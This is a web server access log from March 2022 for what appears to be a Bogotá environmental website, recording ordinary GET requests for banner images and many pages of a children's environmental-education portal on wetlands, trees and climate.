186.155.16.6 - - [14/Mar/2022:22:32:18 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
186.155.16.6 - - [14/Mar/2022:22:32:19 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
186.155.16.6 - - [14/Mar/2022:22:32:19 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
186.155.16.6 - - [14/Mar/2022:22:32:20 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
186.155.16.6 - - [14/Mar/2022:22:32:20 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
40.77.167.28 - - [14/Mar/2022:22:33:02 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
191.95.23.91 - - [14/Mar/2022:22:33:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 233335
216.245.221.92 - - [14/Mar/2022:22:34:14 -0500] "HEAD / HTTP/1.1" 200 -
185.247.226.98 - - [14/Mar/2022:22:35:49 -0500] "GET / HTTP/1.1" 200 319
185.220.100.253 - - [14/Mar/2022:22:35:58 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
199.16.157.182 - - [14/Mar/2022:22:36:12 -0500] "GET /images/humedales-agua-14-diciembre.jpg HTTP/1.1" 200 111054
103.136.124.228 - - [14/Mar/2022:22:36:38 -0500] "GET /portaldeninos/aulas-ambientales/ HTTP/1.1" 200 81238
103.136.124.228 - - [14/Mar/2022:22:36:38 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 83021
103.136.124.228 - - [14/Mar/2022:22:36:43 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 83228
103.136.124.228 - - [14/Mar/2022:22:36:44 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 82418
103.136.124.228 - - [14/Mar/2022:22:36:47 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 82677
103.136.124.228 - - [14/Mar/2022:22:36:47 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 82128
103.136.124.228 - - [14/Mar/2022:22:36:49 -0500] "GET /portaldeninos/los-animales/ HTTP/1.1" 200 102935
103.136.124.228 - - [14/Mar/2022:22:36:52 -0500] "GET /portaldeninos/los-arboles/ HTTP/1.1" 200 80368
103.136.124.228 - - [14/Mar/2022:22:36:53 -0500] "GET /portaldeninos/los-arboles/tips/ HTTP/1.1" 200 80499
103.136.124.228 - - [14/Mar/2022:22:36:54 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 102624
103.136.124.228 - - [14/Mar/2022:22:36:57 -0500] "GET /portaldeninos/fauna/ HTTP/1.1" 200 81251
103.136.124.228 - - [14/Mar/2022:22:36:58 -0500] "GET /portaldeninos/aire/ HTTP/1.1" 200 81041
103.136.124.228 - - [14/Mar/2022:22:37:00 -0500] "GET /portaldeninos/ruido/ HTTP/1.1" 200 81316
103.136.124.228 - - [14/Mar/2022:22:37:00 -0500] "GET /portaldeninos/publicidad/ HTTP/1.1" 200 80391
207.241.232.241 - - [14/Mar/2022:22:37:02 -0500] "-" 408 -
103.136.124.228 - - [14/Mar/2022:22:37:03 -0500] "GET /portaldeninos/glosario/ HTTP/1.1" 200 90020
103.136.124.228 - - [14/Mar/2022:22:37:03 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 86590
103.136.124.228 - - [14/Mar/2022:22:37:04 -0500] "GET /portaldeninos/humedales-ramsar/ HTTP/1.1" 200 82077
103.136.124.228 - - [14/Mar/2022:22:37:09 -0500] "GET /portaldeninos/humedal-tibanica-2/ HTTP/1.1" 200 80593
103.136.124.228 - - [14/Mar/2022:22:37:11 -0500] "GET /portaldeninos/humedal-torca-y-guaymaral-2/ HTTP/1.1" 200 80908
103.136.124.228 - - [14/Mar/2022:22:37:12 -0500] "GET /portaldeninos/humedal-la-vaca-2/ HTTP/1.1" 200 80659
103.136.124.228 - - [14/Mar/2022:22:37:12 -0500] "GET /portaldeninos/humedal-la-conejera-2/ HTTP/1.1" 200 80842
103.136.124.228 - - [14/Mar/2022:22:37:16 -0500] "GET /portaldeninos/humedal-juan-amarillo-2/ HTTP/1.1" 200 80977
103.136.124.228 - - [14/Mar/2022:22:37:16 -0500] "GET /portaldeninos/humedal-jaboque-2/ HTTP/1.1" 200 80668
103.136.124.228 - - [14/Mar/2022:22:37:11 -0500] "GET /portaldeninos/humedal-santa-maria-del-lago/ HTTP/1.1" 200 81810
103.136.124.228 - - [14/Mar/2022:22:37:18 -0500] "GET /portaldeninos/humedal-el-tunjo/ HTTP/1.1" 200 80483
103.136.124.228 - - [14/Mar/2022:22:37:19 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 80748
103.136.124.228 - - [14/Mar/2022:22:37:25 -0500] "GET /portaldeninos/gestion-del-riesgo-incendios-forestales HTTP/1.1" 301 -
103.136.124.228 - - [14/Mar/2022:22:37:24 -0500] "GET /portaldeninos/humedal-cordoba-2/ HTTP/1.1" 200 80867
103.136.124.228 - - [14/Mar/2022:22:37:24 -0500] "GET /portaldeninos/humedal-capellania-2/ HTTP/1.1" 200 80771
103.136.124.228 - - [14/Mar/2022:22:37:27 -0500] "GET /portaldeninos/biodiversidad HTTP/1.1" 301 -
103.136.124.228 - - [14/Mar/2022:22:37:27 -0500] "GET /portaldeninos/agua-y-estructura-ecologica-principal HTTP/1.1" 301 -
103.136.124.228 - - [14/Mar/2022:22:37:26 -0500] "GET /portaldeninos/gestion-del-riesgo-incendios-forestales/ HTTP/1.1" 200 79647
103.136.124.228 - - [14/Mar/2022:22:37:27 -0500] "GET /portaldeninos/biodiversidad/ HTTP/1.1" 200 79455
103.136.124.228 - - [14/Mar/2022:22:37:28 -0500] "GET /portaldeninos/agua-y-estructura-ecologica-principal/ HTTP/1.1" 200 80310
103.136.124.228 - - [14/Mar/2022:22:37:30 -0500] "GET /portaldeninos/que-es-cambio-climatico HTTP/1.1" 301 -
